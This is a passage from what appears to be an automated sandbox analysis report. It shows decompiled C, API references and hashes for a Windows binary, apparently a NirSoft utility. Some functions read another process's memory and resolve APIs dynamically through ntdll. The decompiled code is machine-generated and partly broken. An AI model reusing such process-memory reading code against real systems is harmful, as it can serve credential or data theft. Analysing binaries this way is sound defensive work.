					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                    0x00409faf
                                                                                                                    0x00409fb4
                                                                                                                    0x00409fb5
                                                                                                                    0x00409fb6
                                                                                                                    0x0040a043
                                                                                                                    0x0040a04a
                                                                                                                    0x0040a058
                                                                                                                    0x0040a05f
                                                                                                                    0x0040a06d
                                                                                                                    0x0040a074
                                                                                                                    0x0040a08e
                                                                                                                    0x0040a099
                                                                                                                    0x0040a0ab
                                                                                                                    0x0040a0c9
                                                                                                                    0x0040a0ce
                                                                                                                    0x00000000
                                                                                                                    0x0040a0ce
                                                                                                                    0x00409fc3
                                                                                                                    0x00409fca
                                                                                                                    0x00409fd8
                                                                                                                    0x00409fdf
                                                                                                                    0x00409ff9
                                                                                                                    0x0040a006
                                                                                                                    0x0040a018
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                    • String ID: %%0.%df
                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                    • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                    • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                    • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                    • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                    0x00406216
                                                                                                                    0x0040621b
                                                                                                                    0x00406222
                                                                                                                    0x0040625f
                                                                                                                    0x00406263
                                                                                                                    0x00406269
                                                                                                                    0x00406271
                                                                                                                    0x00406273
                                                                                                                    0x00406289
                                                                                                                    0x00406289
                                                                                                                    0x0040628e
                                                                                                                    0x0040628f
                                                                                                                    0x004062a9
                                                                                                                    0x004062ab
                                                                                                                    0x004062ad
                                                                                                                    0x004062b0
                                                                                                                    0x004062c3
                                                                                                                    0x004062c3
                                                                                                                    0x004062d3
                                                                                                                    0x004062da
                                                                                                                    0x004062f1
                                                                                                                    0x004062f7
                                                                                                                    0x004062fe
                                                                                                                    0x0040630d
                                                                                                                    0x00406312
                                                                                                                    0x0040631e
                                                                                                                    0x00406327
                                                                                                                    0x00406275
                                                                                                                    0x00406283
                                                                                                                    0x00406283
                                                                                                                    0x00406285
                                                                                                                    0x00406287
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x00406280
                                                                                                                    0x00406280
                                                                                                                    0x00000000
                                                                                                                    0x00406280
                                                                                                                    0x00000000
                                                                                                                    0x0040627a
                                                                                                                    0x00000000
                                                                                                                    0x00406283
                                                                                                                    0x00406273
                                                                                                                    0x00406224
                                                                                                                    0x00406224
                                                                                                                    0x00406229
                                                                                                                    0x0040622a
                                                                                                                    0x0040622f
                                                                                                                    0x00406236
                                                                                                                    0x0040623c
                                                                                                                    0x00406243
                                                                                                                    0x00406245
                                                                                                                    0x00406247
                                                                                                                    0x00406248
                                                                                                                    0x0040624b
                                                                                                                    0x00406254
                                                                                                                    0x00406254
                                                                                                                    0x0040632d
                                                                                                                    0x00406334

                                                                                                                    APIs
                                                                                                                    • LoadMenuW.USER32 ref: 00406236
                                                                                                                      • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                      • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                      • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                      • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                    • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                    • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                    • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                    • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                    • memset.MSVCRT ref: 004062DA
                                                                                                                    • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                    • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                    • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                      • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                    • String ID: caption
                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                    • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                    • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                    • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                    • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 65%
                                                                                                                    			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                    0x004081e4
                                                                                                                    0x004081ec
                                                                                                                    0x004081fc
                                                                                                                    0x00408200
                                                                                                                    0x00408215
                                                                                                                    0x0040821c
                                                                                                                    0x0040822a
                                                                                                                    0x00408231
                                                                                                                    0x0040823f
                                                                                                                    0x00408246
                                                                                                                    0x0040824b
                                                                                                                    0x0040824e
                                                                                                                    0x0040825a
                                                                                                                    0x0040825c
                                                                                                                    0x00408261
                                                                                                                    0x0040826c
                                                                                                                    0x0040826d
                                                                                                                    0x0040826e
                                                                                                                    0x00408273
                                                                                                                    0x00408273
                                                                                                                    0x00408276
                                                                                                                    0x0040827c
                                                                                                                    0x0040828a
                                                                                                                    0x00408290
                                                                                                                    0x004082ab
                                                                                                                    0x004082c5
                                                                                                                    0x004082c6
                                                                                                                    0x004082d1
                                                                                                                    0x004082d2
                                                                                                                    0x004082d3
                                                                                                                    0x004082e7
                                                                                                                    0x004082ec
                                                                                                                    0x004082f0
                                                                                                                    0x00000000
                                                                                                                    0x004082f5
                                                                                                                    0x004082fe

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                    • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                    • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                    • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                    • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                    0x0040920a
                                                                                                                    0x00409218
                                                                                                                    0x00409223
                                                                                                                    0x0040922c
                                                                                                                    0x0040924b
                                                                                                                    0x00409253
                                                                                                                    0x0040929b
                                                                                                                    0x004092e4
                                                                                                                    0x0040929d
                                                                                                                    0x004092a3
                                                                                                                    0x004092b1
                                                                                                                    0x004092bd
                                                                                                                    0x004092cc
                                                                                                                    0x004092d1
                                                                                                                    0x004092d8
                                                                                                                    0x004092dd
                                                                                                                    0x00409255
                                                                                                                    0x0040925b
                                                                                                                    0x00409269
                                                                                                                    0x00409275
                                                                                                                    0x00409282
                                                                                                                    0x0040928d
                                                                                                                    0x00409292
                                                                                                                    0x004092ec
                                                                                                                    0x004092ef
                                                                                                                    0x004092ef
                                                                                                                    0x00409231
                                                                                                                    0x00409232
                                                                                                                    0x00409233
                                                                                                                    0x00000000
                                                                                                                    0x00409239
                                                                                                                    0x0040921a
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 00409223
                                                                                                                    • wcscpy.MSVCRT ref: 00409233
                                                                                                                      • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                      • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                      • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                    • wcscpy.MSVCRT ref: 00409282
                                                                                                                    • wcscat.MSVCRT ref: 0040928D
                                                                                                                    • memset.MSVCRT ref: 00409269
                                                                                                                      • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                      • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                    • memset.MSVCRT ref: 004092B1
                                                                                                                    • memcpy.MSVCRT ref: 004092CC
                                                                                                                    • wcscat.MSVCRT ref: 004092D8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                    • String ID: \systemroot
                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                    • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                    • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                    • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                    • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 48%
                                                                                                                    			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                    0x00409c73
                                                                                                                    0x00409c7c
                                                                                                                    0x00409c90
                                                                                                                    0x00409c9f
                                                                                                                    0x00409ca2
                                                                                                                    0x00409ca7
                                                                                                                    0x00409ca9
                                                                                                                    0x00409cb1
                                                                                                                    0x00409cc0
                                                                                                                    0x00409cc2
                                                                                                                    0x00409cc7
                                                                                                                    0x00409ccf
                                                                                                                    0x00409cd0
                                                                                                                    0x00409cd7
                                                                                                                    0x00409cd8
                                                                                                                    0x00409cd9
                                                                                                                    0x00409cda
                                                                                                                    0x00409cdc
                                                                                                                    0x00409ce0
                                                                                                                    0x00409ce1
                                                                                                                    0x00409ce9
                                                                                                                    0x00409cf1
                                                                                                                    0x00409cfb
                                                                                                                    0x00409d08
                                                                                                                    0x00409d08
                                                                                                                    0x00000000
                                                                                                                    0x00409d0d
                                                                                                                    0x00409d0f

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                    • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                    • strlen.MSVCRT ref: 00409CE4
                                                                                                                    • strlen.MSVCRT ref: 00409CF1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcstrlen
                                                                                                                    • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                    • API String ID: 1027343248-2054640941
                                                                                                                    • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                    • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                    • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                    • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                                    0x00401ac9
                                                                                                                    0x00401ad1
                                                                                                                    0x00401ae1
                                                                                                                    0x00401ae7
                                                                                                                    0x00401ae9
                                                                                                                    0x00401aec
                                                                                                                    0x00401c1b
                                                                                                                    0x00401af2
                                                                                                                    0x00401af2
                                                                                                                    0x00401af8
                                                                                                                    0x00401b0c
                                                                                                                    0x00401b1a
                                                                                                                    0x00401bfd
                                                                                                                    0x00401b20
                                                                                                                    0x00401b26
                                                                                                                    0x00401b2b
                                                                                                                    0x00401b36
                                                                                                                    0x00401b40
                                                                                                                    0x00401b43
                                                                                                                    0x00401b4a
                                                                                                                    0x00401b54
                                                                                                                    0x00401b55
                                                                                                                    0x00401b56
                                                                                                                    0x00401b57
                                                                                                                    0x00401b58
                                                                                                                    0x00401b63
                                                                                                                    0x00401b68
                                                                                                                    0x00401b69
                                                                                                                    0x00401b77
                                                                                                                    0x00401b7d
                                                                                                                    0x00401b82
                                                                                                                    0x00401b82
                                                                                                                    0x00401b88
                                                                                                                    0x00401b8b
                                                                                                                    0x00401b8e
                                                                                                                    0x00401b91
                                                                                                                    0x00401b98
                                                                                                                    0x00401b9b
                                                                                                                    0x00401ba0
                                                                                                                    0x00401ba5
                                                                                                                    0x00401baa
                                                                                                                    0x00401bac
                                                                                                                    0x00401bac
                                                                                                                    0x00401bb2
                                                                                                                    0x00401bb2
                                                                                                                    0x00401bbe
                                                                                                                    0x00401bc4
                                                                                                                    0x00401bc6
                                                                                                                    0x00401bc8
                                                                                                                    0x00401bc8
                                                                                                                    0x00401bd7
                                                                                                                    0x00401bee
                                                                                                                    0x00401bf0
                                                                                                                    0x00401bf0
                                                                                                                    0x00401c0e
                                                                                                                    0x00401c0e
                                                                                                                    0x00401c23

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                    • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                    • memset.MSVCRT ref: 00401B4A
                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                    • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                      • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                      • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                    • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                    • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                    • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                    • String ID: %d %I64x
                                                                                                                    • API String ID: 2567117392-2565891505
                                                                                                                    • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                    • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                    • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                    • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 39%
                                                                                                                    			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
